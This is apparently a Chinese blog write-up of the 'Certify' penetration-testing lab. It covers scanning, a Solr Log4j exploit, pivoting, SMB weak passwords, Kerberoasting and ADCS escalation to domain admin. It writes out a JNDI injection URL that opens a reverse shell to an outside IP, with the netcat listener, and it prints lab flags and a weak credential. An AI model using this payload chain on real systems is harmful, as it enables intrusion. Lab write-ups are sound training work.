春秋云镜-certify

发表于2025-09-12|更新于2025-09-28

|字数总计:517|阅读时长:1分钟|阅读量:

环境开起来fscan扫，没出漏洞

直接上Tscan，没啥有用的扫出来

goby扫扫

两个误报

本地漏洞库没有相关记录

事已至此只能看wp发现是打一个log4j组件漏洞，顺从了

solr的log4j组件漏洞

java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 124.70.133.212

http://39.99.148.57:8983/solr/admin/cores?action=${jndi:ldap://124.70.133.212:1389/Basic/ReverseShell/124.70.133.212/1122}

nc -lvvp 1122

命令上线vshell

简单传个fscan\venom\CS二开linux🐎

上线CS

socks代理

fscan开扫

fscan信息整理

172.22.9.19 本机linux
存在xiaorang.lab域
172.22.9.7 XIAORANG-DC

172.22.9.26 DESKTOP-CBKTVMO

172.22.9.47 
21端口ftp开放
80端口开放
445 administrator Pass:123456 共享:[print$ fileshare IPC$]

本地提权获取 flag1

suid

全是fvv

guid

全是fvv

sudo

有个grc看看是个啥

1	flag01: flag{eea0f723-dca9-4d0e-9de3-d5bbf2fbd86a}

smb弱口令到172.22.9.47

根据fscan扫出来的

1	proxychains -q smbclient \\\\172.22.9.47\\fileshare

拿到flag2、提示、数据库

1	flag02: flag{130cd388-4dbe-4e7c-81b6-0c7ee03d3fe3}

提示SPN

感觉是Kerberoasting攻击，但是它需要提供一组有效的域内用户凭证（用户名 + 密码或哈希）才能正常工作

数据库里有用户邮箱、薪水、以及四个密码

下一个目标包是172.22.9.26（没有题目会直接爆破域控的，做题角度），得找个服务爆破

先进行全端口扫描

开始爆破172.22.9.26:3389看看有没有账密啥的

venom开socks；winodws代理挂上先

rdp爆破全部失败，Kerberoasting攻击需要的一组账密也没有，没思路了，看WP继续写

事实上，hydra的爆破日志会更加详细，所以还是用老牌爆破工具吧

一共两个格格不入的，是因为rdp服务没起，但是账密是对的

那就能Kerberoasting攻击了

Kerberoasting攻击

rdp上去

内核没漏洞，土豆没权限，结合题目名Certify，打ADCS提权

ADCS提权

ECS1提权

用生成的administrator.pfx获取TGT票据和域管理员的NTLM哈希

随便横向

拿到flag3\4

文章作者: 浮梦司遥

文章链接: http://example.com/2025/09/12/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-certify/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自荒海听雪眠！

jungle的打靶日记

相关推荐

春秋云镜-Tsclient

春秋云镜-Spoofing

春秋云镜-time

评论

ValineDisqus